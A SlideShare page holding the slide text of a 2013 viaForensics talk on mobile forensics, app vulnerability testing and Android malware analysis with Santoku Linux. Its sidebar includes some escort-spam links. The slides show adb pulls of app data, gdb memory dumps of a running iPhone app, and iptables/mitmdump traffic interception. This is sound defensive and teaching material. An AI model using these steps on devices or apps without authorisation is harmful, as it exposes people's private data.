Suche senden
Hochladen
Via forensics appsecusa-nov-2013
•
3 gefällt mir
•
2,367 views
D
drewz lin
Folgen
Technologie
Melden
Teilen
Melden
Teilen
1 von 40
Jetzt herunterladen
Downloaden Sie, um offline zu lesen
Empfohlen
I mas appsecusa-nov13-v2
I mas appsecusa-nov13-v2
drewz lin
Android Hacking
Android Hacking
antitree
Android security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh Ojha
Yogesh Ojha
Building a Mobile App Pen Testing Blueprint
Building a Mobile App Pen Testing Blueprint
NowSecure
Top OSS for Mobile AppSec Testing: The Latest on R2 and FRIDA
Top OSS for Mobile AppSec Testing: The Latest on R2 and FRIDA
NowSecure
Debunking the Top 5 Myths About Mobile AppSec
Debunking the Top 5 Myths About Mobile AppSec
NowSecure
OSS Tools: Creating a Reverse Engineering Plug-in for r2frida
OSS Tools: Creating a Reverse Engineering Plug-in for r2frida
NowSecure
[CB16] Security in the IoT World: Analyzing the Security of Mobile Apps for A...
[CB16] Security in the IoT World: Analyzing the Security of Mobile Apps for A...
CODE BLUE
Empfohlen
I mas appsecusa-nov13-v2
I mas appsecusa-nov13-v2
drewz lin
Android Hacking
Android Hacking
antitree
Android security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh Ojha
Yogesh Ojha
Building a Mobile App Pen Testing Blueprint
Building a Mobile App Pen Testing Blueprint
NowSecure
Top OSS for Mobile AppSec Testing: The Latest on R2 and FRIDA
Top OSS for Mobile AppSec Testing: The Latest on R2 and FRIDA
NowSecure
Debunking the Top 5 Myths About Mobile AppSec
Debunking the Top 5 Myths About Mobile AppSec
NowSecure
OSS Tools: Creating a Reverse Engineering Plug-in for r2frida
OSS Tools: Creating a Reverse Engineering Plug-in for r2frida
NowSecure
[CB16] Security in the IoT World: Analyzing the Security of Mobile Apps for A...
[CB16] Security in the IoT World: Analyzing the Security of Mobile Apps for A...
CODE BLUE
The Internet of Things: We've Got to Chat
The Internet of Things: We've Got to Chat
Duo Security
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
Yogesh Ojha
LASCON 2015
LASCON 2015
Clare Nelson, CISSP, CIPP-E
Certificate Pinning in Mobile Applications
Certificate Pinning in Mobile Applications
Luca Bongiorni
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Andrew Morris
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
Minseok(Jacky) Cha
Cyber espionage - Tinker, taylor, soldier, spy
Cyber espionage - Tinker, taylor, soldier, spy
b coatesworth
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Zivaro Inc
Implementing a comprehensive application security progaram - Tawfiq
Implementing a comprehensive application security progaram - Tawfiq
OWASP-Qatar Chapter
RSA2015: Securing the Internet of Things
RSA2015: Securing the Internet of Things
Daniel Miessler
Protecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-ons
Imperva
IoT Attack Surfaces -- DEFCON 2015
IoT Attack Surfaces -- DEFCON 2015
Daniel Miessler
Xamarin security talk slideshare
Xamarin security talk slideshare
Marcus de Wilde
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Mender.io
China Cyber
China Cyber
Dominic Karunesudas
Anonymizers
Anonymizers
Gregory Hanis
Forensicating the Apple TV
Forensicating the Apple TV
Reality Net System Solutions
Simplified Security Code Review Process
Simplified Security Code Review Process
Sherif Koussa
Android Secure Coding
Android Secure Coding
JPCERT Coordination Center
Security as a top of mind issue for mobile application development
Security as a top of mind issue for mobile application development
Ștefan Popa
Owasp2013 johannesullrich
Owasp2013 johannesullrich
drewz lin
Phu appsec13
Phu appsec13
drewz lin
Weitere ähnliche Inhalte
Was ist angesagt?
The Internet of Things: We've Got to Chat
The Internet of Things: We've Got to Chat
Duo Security
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
Yogesh Ojha
LASCON 2015
LASCON 2015
Clare Nelson, CISSP, CIPP-E
Certificate Pinning in Mobile Applications
Certificate Pinning in Mobile Applications
Luca Bongiorni
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Andrew Morris
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
Minseok(Jacky) Cha
Cyber espionage - Tinker, taylor, soldier, spy
Cyber espionage - Tinker, taylor, soldier, spy
b coatesworth
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Zivaro Inc
Implementing a comprehensive application security progaram - Tawfiq
Implementing a comprehensive application security progaram - Tawfiq
OWASP-Qatar Chapter
RSA2015: Securing the Internet of Things
RSA2015: Securing the Internet of Things
Daniel Miessler
Protecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-ons
Imperva
IoT Attack Surfaces -- DEFCON 2015
IoT Attack Surfaces -- DEFCON 2015
Daniel Miessler
Xamarin security talk slideshare
Xamarin security talk slideshare
Marcus de Wilde
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Mender.io
China Cyber
China Cyber
Dominic Karunesudas
Anonymizers
Anonymizers
Gregory Hanis
Forensicating the Apple TV
Forensicating the Apple TV
Reality Net System Solutions
Simplified Security Code Review Process
Simplified Security Code Review Process
Sherif Koussa
Android Secure Coding
Android Secure Coding
JPCERT Coordination Center
Security as a top of mind issue for mobile application development
Security as a top of mind issue for mobile application development
Ștefan Popa
Was ist angesagt?
(20)
The Internet of Things: We've Got to Chat
The Internet of Things: We've Got to Chat
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
LASCON 2015
LASCON 2015
Certificate Pinning in Mobile Applications
Certificate Pinning in Mobile Applications
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
Cyber espionage - Tinker, taylor, soldier, spy
Cyber espionage - Tinker, taylor, soldier, spy
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Implementing a comprehensive application security progaram - Tawfiq
Implementing a comprehensive application security progaram - Tawfiq
RSA2015: Securing the Internet of Things
RSA2015: Securing the Internet of Things
Protecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-ons
IoT Attack Surfaces -- DEFCON 2015
IoT Attack Surfaces -- DEFCON 2015
Xamarin security talk slideshare
Xamarin security talk slideshare
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
China Cyber
China Cyber
Anonymizers
Anonymizers
Forensicating the Apple TV
Forensicating the Apple TV
Simplified Security Code Review Process
Simplified Security Code Review Process
Android Secure Coding
Android Secure Coding
Security as a top of mind issue for mobile application development
Security as a top of mind issue for mobile application development
Andere mochten auch
Owasp2013 johannesullrich
Owasp2013 johannesullrich
drewz lin
Phu appsec13
Phu appsec13
drewz lin
Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2
drewz lin
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-keary
drewz lin
Appsec 2013-krehel-ondrej-forensic-investigations-of-web-exploitations
Appsec 2013-krehel-ondrej-forensic-investigations-of-web-exploitations
drewz lin
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equal
drewz lin
Appsec2013 assurance tagging-robert martin
Appsec2013 assurance tagging-robert martin
drewz lin
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaola
drewz lin
Appsec2013 presentation-dickson final-with_all_final_edits
Appsec2013 presentation-dickson final-with_all_final_edits
drewz lin
Chuck willis-owaspbwa-beyond-1.0-app secusa-2013-11-21
Chuck willis-owaspbwa-beyond-1.0-app secusa-2013-11-21
drewz lin
基于虚拟化技术的分布式软件测试框架
基于虚拟化技术的分布式软件测试框架
drewz lin
新浪微博稳定性经验谈
新浪微博稳定性经验谈
drewz lin
Cyber Threats & Cybersecurity - Are You Ready? - Jared Carstensen
Cyber Threats & Cybersecurity - Are You Ready? - Jared Carstensen
jaredcarst
Telecom security issues (Raoul Chiesa, day 1 )
Telecom security issues (Raoul Chiesa, day 1 )
ClubHack
Information Security
Information Security
SamilMehdiyev
Pptv lb日志实时分析平台
Pptv lb日志实时分析平台
drewz lin
Breaking down the cyber security framework closing critical it security gaps
Breaking down the cyber security framework closing critical it security gaps
IBM Security
1 security goals
1 security goals
drewz lin
Cryptography and Encryptions,Network Security,Caesar Cipher
Cryptography and Encryptions,Network Security,Caesar Cipher
Gopal Sakarkar
Cryptography.ppt
Cryptography.ppt
kusum sharma
Andere mochten auch
(20)
Owasp2013 johannesullrich
Owasp2013 johannesullrich
Phu appsec13
Phu appsec13
Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-keary
Appsec 2013-krehel-ondrej-forensic-investigations-of-web-exploitations
Appsec 2013-krehel-ondrej-forensic-investigations-of-web-exploitations
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equal
Appsec2013 assurance tagging-robert martin
Appsec2013 assurance tagging-robert martin
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec2013 presentation-dickson final-with_all_final_edits
Appsec2013 presentation-dickson final-with_all_final_edits
Chuck willis-owaspbwa-beyond-1.0-app secusa-2013-11-21
Chuck willis-owaspbwa-beyond-1.0-app secusa-2013-11-21
基于虚拟化技术的分布式软件测试框架
基于虚拟化技术的分布式软件测试框架
新浪微博稳定性经验谈
新浪微博稳定性经验谈
Cyber Threats & Cybersecurity - Are You Ready? - Jared Carstensen
Cyber Threats & Cybersecurity - Are You Ready? - Jared Carstensen
Telecom security issues (Raoul Chiesa, day 1 )
Telecom security issues (Raoul Chiesa, day 1 )
Information Security
Information Security
Pptv lb日志实时分析平台
Pptv lb日志实时分析平台
Breaking down the cyber security framework closing critical it security gaps
Breaking down the cyber security framework closing critical it security gaps
1 security goals
1 security goals
Cryptography and Encryptions,Network Security,Caesar Cipher
Cryptography and Encryptions,Network Security,Caesar Cipher
Cryptography.ppt
Cryptography.ppt
Ähnlich wie Via forensics appsecusa-nov-2013
Via forensics thotcon-2013-mobile-security-with-santoku-linux
Via forensics thotcon-2013-mobile-security-with-santoku-linux
viaForensics
Mobile Penetration Testing: Episode 1 - The Forensic Menace
Mobile Penetration Testing: Episode 1 - The Forensic Menace
NowSecure
Mobile Penetration Testing: Episode III - Attack of the Code
Mobile Penetration Testing: Episode III - Attack of the Code
NowSecure
Pentesting Android Applications
Pentesting Android Applications
Cláudio André
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Subho Halder
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the Berries
Tyler Shields
OWASP Mobile Top 10
OWASP Mobile Top 10
NowSecure
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
viaForensics
(Pptx) yury chemerkin hacker_halted_2013
(Pptx) yury chemerkin hacker_halted_2013
STO STRATEGY
(Pdf) yury chemerkin hackfest.ca_2013
(Pdf) yury chemerkin hackfest.ca_2013
STO STRATEGY
(Pdf) yury chemerkin hacktivity_2013
(Pdf) yury chemerkin hacktivity_2013
STO STRATEGY
Securing Android
Securing Android
Marakana Inc.
Contextual Voice/Communications as an App or App Feature (on Android)
Contextual Voice/Communications as an App or App Feature (on Android)
Carlos Enrique Ortiz
2024_hackersuli_mobil_ios_android ______
2024_hackersuli_mobil_ios_android ______
hackersuli
Les 10 risques liés aux applications mobiles
Les 10 risques liés aux applications mobiles
Bee_Ware
Secure Android Apps- nVisium Security
Secure Android Apps- nVisium Security
Jack Mannino
Droidcon mobile security
Droidcon mobile security
Judy Ngure
PRESENTATION of CEH Tools.pptx
PRESENTATION of CEH Tools.pptx
AadityaSaxena12
200:1 - Do You Trust Your Mobile Security Odds?
200:1 - Do You Trust Your Mobile Security Odds?
Blueboxer2014
CASE STUDY - Ironclad Messaging & Secure App Dev for Regulated Industries
CASE STUDY - Ironclad Messaging & Secure App Dev for Regulated Industries
NowSecure
Ähnlich wie Via forensics appsecusa-nov-2013
(20)
Via forensics thotcon-2013-mobile-security-with-santoku-linux
Via forensics thotcon-2013-mobile-security-with-santoku-linux
Mobile Penetration Testing: Episode 1 - The Forensic Menace
Mobile Penetration Testing: Episode 1 - The Forensic Menace
Mobile Penetration Testing: Episode III - Attack of the Code
Mobile Penetration Testing: Episode III - Attack of the Code
Pentesting Android Applications
Pentesting Android Applications
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the Berries
OWASP Mobile Top 10
OWASP Mobile Top 10
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
(Pptx) yury chemerkin hacker_halted_2013
(Pptx) yury chemerkin hacker_halted_2013
(Pdf) yury chemerkin hackfest.ca_2013
(Pdf) yury chemerkin hackfest.ca_2013
(Pdf) yury chemerkin hacktivity_2013
(Pdf) yury chemerkin hacktivity_2013
Securing Android
Securing Android
Contextual Voice/Communications as an App or App Feature (on Android)
Contextual Voice/Communications as an App or App Feature (on Android)
2024_hackersuli_mobil_ios_android ______
2024_hackersuli_mobil_ios_android ______
Les 10 risques liés aux applications mobiles
Les 10 risques liés aux applications mobiles
Secure Android Apps- nVisium Security
Secure Android Apps- nVisium Security
Droidcon mobile security
Droidcon mobile security
PRESENTATION of CEH Tools.pptx
PRESENTATION of CEH Tools.pptx
200:1 - Do You Trust Your Mobile Security Odds?
200:1 - Do You Trust Your Mobile Security Odds?
CASE STUDY - Ironclad Messaging & Secure App Dev for Regulated Industries
CASE STUDY - Ironclad Messaging & Secure App Dev for Regulated Industries
Mehr von drewz lin
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
drewz lin
Appsec usa roberthansen
Appsec usa roberthansen
drewz lin
Appsec2013 presentation
Appsec2013 presentation
drewz lin
Amol scadaowasp
Amol scadaowasp
drewz lin
Agile sdlc-v1.1-owasp-app sec-usa
Agile sdlc-v1.1-owasp-app sec-usa
drewz lin
Vulnex app secusa2013
Vulnex app secusa2013
drewz lin
无线App的性能分析和监控实践 rickyqiu
无线App的性能分析和监控实践 rickyqiu
drewz lin
网易移动自动化测试实践(孔庆云)
网易移动自动化测试实践(孔庆云)
drewz lin
天猫后端技术架构优化实践
天猫后端技术架构优化实践
drewz lin
天猫大促性能测试实践 耿电
天猫大促性能测试实践 耿电
drewz lin
互联网海量运维 20130807
互联网海量运维 20130807
drewz lin
阿里自研数据库 Ocean base实践
阿里自研数据库 Ocean base实践
drewz lin
T4 淘宝私有云
T4 淘宝私有云
drewz lin
I os与android多平台开发心得
I os与android多平台开发心得
drewz lin
Hadoop在反作弊中的应用 林述民
Hadoop在反作弊中的应用 林述民
drewz lin
人人网服务化与架构变迁V3
人人网服务化与架构变迁V3
drewz lin
有道云笔记架构简介
有道云笔记架构简介
drewz lin
Mehr von drewz lin
(17)
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Appsec usa roberthansen
Appsec usa roberthansen
Appsec2013 presentation
Appsec2013 presentation
Amol scadaowasp
Amol scadaowasp
Agile sdlc-v1.1-owasp-app sec-usa
Agile sdlc-v1.1-owasp-app sec-usa
Vulnex app secusa2013
Vulnex app secusa2013
无线App的性能分析和监控实践 rickyqiu
无线App的性能分析和监控实践 rickyqiu
网易移动自动化测试实践(孔庆云)
网易移动自动化测试实践(孔庆云)
天猫后端技术架构优化实践
天猫后端技术架构优化实践
天猫大促性能测试实践 耿电
天猫大促性能测试实践 耿电
互联网海量运维 20130807
互联网海量运维 20130807
阿里自研数据库 Ocean base实践
阿里自研数据库 Ocean base实践
T4 淘宝私有云
T4 淘宝私有云
I os与android多平台开发心得
I os与android多平台开发心得
Hadoop在反作弊中的应用 林述民
Hadoop在反作弊中的应用 林述民
人人网服务化与架构变迁V3
人人网服务化与架构变迁V3
有道云笔记架构简介
有道云笔记架构简介
Kürzlich hochgeladen
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
The Digital Insurer
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
wesley chun
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
Pooja Nehwal
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
Allon Mureinik
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
Radu Cotescu
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
The Digital Insurer
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Malak Abu Hammad
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
The Digital Insurer
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
Delhi Call girls
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
debabhi2
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Neo4j
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
The Digital Insurer
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
hans926745
Kürzlich hochgeladen
(20)
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
Via forensics appsecusa-nov-2013
1.
Mobile security, forensics
& malware analysis with Santoku Linux * © Copyright 2013 viaForensics, LLC. Proprietary Information.
2.
PRESENTER - ANDREW
HOOG CEO/Co-founder of viaForensics Andrew is a published author, computer scientist, and mobile security & forensics researcher. He has several patents pending and presents on mobile security topics to conferences, enterprise and government audiences. © Copyright 2013 viaForensics, LLC. Proprietary Information. *
3.
VIAFORENSICS OVERVIEW viaForensics is
a mobile security company founded in 2009. Bootstrapped with ~40 employees and a 10 person dedicated mobile security R&D team Some of our f/oss: YAFFS2 in TSK AFLogical OSE Santoku Linux ... © Copyright 2013 viaForensics, LLC. Proprietary Information. *
4.
SANTOKU - WHY? 1600 Desktop
PC Portable PC 1200 Tablet # Units Shipped (millions) Smartphone 700 200 2012 Total: 1,201.1 2017 (Projected) Total: 2,250.3 © Copyright 2013 viaForensics, LLC. Proprietary Information. *
5.
SANTOKU - WHAT? ©
Copyright 2013 viaForensics, LLC. Proprietary Information. *
6.
SANTOKU - HOW? — Install
Lubuntu 12.04 (precise) x86_64 — Santoku-ize it © Copyright 2013 viaForensics, LLC. Proprietary Information. *
7.
You should get
(after reboot) © Copyright 2013 viaForensics, LLC. Proprietary Information. *
8.
MOBILE FORENSICS * © Copyright 2013
viaForensics, LLC. Proprietary Information.
9.
FORENSIC ACQUISITION TYPES Logical File
system Physical Description Read device data via backup, API or other controlled access to data Description Copy of files of file system Description Bit-by-bit copy of physical drive Use cases More data than logical Use cases Most forensically sound technique Re-creating encrypted file system Increases chance of deleted data recovery Challenges Often very limited access to data Challenges Requires additional access to device Challenges Cannot pull hard drive on mobile devices Usually requires unlocked passcode Many file system files not responsive on cases FTL may not provide bad blocks Use cases Fast Data generally well structured © Copyright 2013 viaForensics, LLC. Proprietary Information. *
10.
iOS Logical — Connect device
(enter PIN if needed) — ideviceback2 backup <backup dir> — ideviceback2 unback <backup dir> — View backup|unpacked backup © Copyright 2013 viaForensics, LLC. Proprietary Information. *
11.
iOS Logical © Copyright
2013 viaForensics, LLC. Proprietary Information. *
12.
iPhone Backup Analyzer ©
Copyright 2013 viaForensics, LLC. Proprietary Information. *
13.
Android Logical — AFLogical OSE https://github.com/viaforensics/android-forensics — Reads
Content Providers — Push to phone, run, store on SD Card — Pull CSVs to Santoku for review © Copyright 2013 viaForensics, LLC. Proprietary Information. *
14.
AFLogical OSE © Copyright
2013 viaForensics, LLC. Proprietary Information. *
15.
Install, run, extract ©
Copyright 2013 viaForensics, LLC. Proprietary Information. *
16.
Slap a GUI
on that © Copyright 2013 viaForensics, LLC. Proprietary Information. *
17.
MOBILE SECURITY * © Copyright 2013
viaForensics, LLC. Proprietary Information.
18.
© Copyright 2013
viaForensics, LLC. Proprietary Information. *
19.
APP SELECTION Apps were
selected based on popularity, number of downloads, or potential sensitivity of data Approximately 80 apps have been reviewed and organized into categories Category # apps reviewed Finance 10 Lifestyle 11 Productivity 6 Travel 5 Social Networking 6 Security 6 Other 6 © Copyright 2013 viaForensics, LLC. Proprietary Information. *
20.
2013 APP TESTING
RESULTS 81 tested apps - 32 iOS, 49 Android 100% 75% 65% 59% % found vulnerable iOS 50% 45% Android 25% 20% 18% 15% Failed MiTM or SSL Stored Password (plaintext or hashed) Stored Sensitive app data in memory At least one "High" risk rating © Copyright 2013 viaForensics, LLC. Proprietary Information. *
21.
© Copyright 2013
viaForensics, LLC. Proprietary Information. *
22.
Any.DO — Business and personal
task management app iOS and Android — Millions of users — Many vulnerabilities, no response from company — https://viaforensics.com/mobile-security/security-vulnerabilities-anydo-android.html © Copyright 2013 viaForensics, LLC. Proprietary Information. *
23.
Any.DO Analysis -
Forensics — Locate Any.DO app directory adb pull /data/data/com.anydo — Examine database/binary files — Capture network traffic © Copyright 2013 viaForensics, LLC. Proprietary Information. *
24.
Any.DO Analysis -
Forensics © Copyright 2013 viaForensics, LLC. Proprietary Information. *
25.
© Copyright 2013
viaForensics, LLC. Proprietary Information. *
26.
Any.DO Analysis -
Memory — SSH into iPhone iproxy ; ssh — Find app PID ps -ef | grep <app-name> — Dump RAM using gdb Script to extract RAM — Extract and analyze scp ; grep © Copyright 2013 viaForensics, LLC. Proprietary Information. *
27.
MOBILE MALWARE ANALYSIS * © Copyright 2013
viaForensics, LLC. Proprietary Information.
28.
NQ MOBILE Sensitive data Encryption Security Contacts Websites
visited Installed Apps Phone # IMEI/IMSI Android ID SMS (referenced) Email (referenced) Chinese Server #1: Ciphered, crackable Attempts to gain root access Tries to mount /system r+w Chinese Server #2: Encryption key included in data stream Generates fake anti-virus alerts Amazon EC2 Server: Plaintext © Copyright 2013 viaForensics, LLC. Proprietary Information. *
29.
Bad News — Android Malware,
masquerades as an innocent advertising network — Packaged in many legitimate apps, usually targeting the Russian market — Has ability to download additional apps, and prompts the user to install them, posing as "Critical Updates". Uses this mechanism to spread known malware, typically Premium Rate SMS fraud. — For more information see the report by Lookout: https://blog.lookout.com/blog/2013/04/19/thebearer-of-badnews-malware-google-play/ © Copyright 2013 viaForensics, LLC. Proprietary Information. *
30.
apktool — apktool is a
tool for reverse engineering Android apk, it disassembles the code to .smali files, decoding also the resources contained into the apk. — It can also repackage the applications after you have modified them. — We can run it on a Badnews sample: — $ apktool d ru.blogspot.playsib.savageknife.apk savage_knife_apktool/ I: Baksmaling... I: Loading resource table... I: Loaded. I: Decoding AndroidManifest.xml with resources... I: Loading resource table from file: /home/santoku/apktool/framework/1.apk I: Loaded. I: Regular manifest package... I: Decoding file-resources... I: Decoding values */* XMLs... I: Done. I: Copying assets and libs… Source: https://code.google.com/p/android-apktool/ © Copyright 2013 viaForensics, LLC. Proprietary Information. *
31.
apktool -> smali — We
can grep for known sensible method calls and strings — $ grep -R getDeviceId . ./smali/com/mobidisplay/advertsv1/AdvService.smali: invoke-virtual {v1}, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String; — $ grep -R BOOT_COMPLETED . ./AndroidManifest.xml: <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> ./AndroidManifest.xml: <action android:name="android.intent.action.BOOT_COMPLETED" /> ./smali/com/mobidisplay/advertsv1/BootReceiver.smali: const-string v2, "android.intent.action.BOOT_COMPLETED" * © Copyright 2013 viaForensics, LLC. Proprietary Information.
32.
apktool -> smali — We
can manually analyze the disassembled smali code provided by apktool. — For example here we see a broadcast receiver that will listen for BOOT_COMPLETED intents and react to them starting a service in the application. * © Copyright 2013 viaForensics, LLC. Proprietary Information.
33.
BadNews Malware Sample
-> Dex2Jar -> JD-GUI Contagio MiniDump Malware Repository contagiominidump.blogspot.com © Copyright 2013 viaForensics, LLC. Proprietary Information. *
34.
Korean Banking Malware Targets Techniques C&C nh.smart .zip
encryption flags LAMP Server (with vulns) com.shinhan.sbanking com.hanabank.ebk.channel. android.hananbank Intercept pkg (un)install Contact Provider Intercept SMS Phone Receiver com.webcash.wooribank Device admin SMS Reciever © Copyright 2013 viaForensics, LLC. Proprietary Information. *
35.
Korean Banking Malware
(Analysis) axmlprinter2 apktool Dynamic Unzip Reverse engineer apktool d -f /home/santoku/Desktop/aaanoflags.apk sudo iptables --t nat --A PREROUTING --j REDIRECT --i wlan0 --p tcp --m tcp ----to-ports 8080 Re-compile apktool b aaa-noflags/ test. apk mitmdump ---vvv -T ----host -z --b 192.168.10.1 axmlprinter2 AndroidManifest. xml dex2jar © Copyright 2013 viaForensics, LLC. Proprietary Information. *
36.
Korean Banking Malware
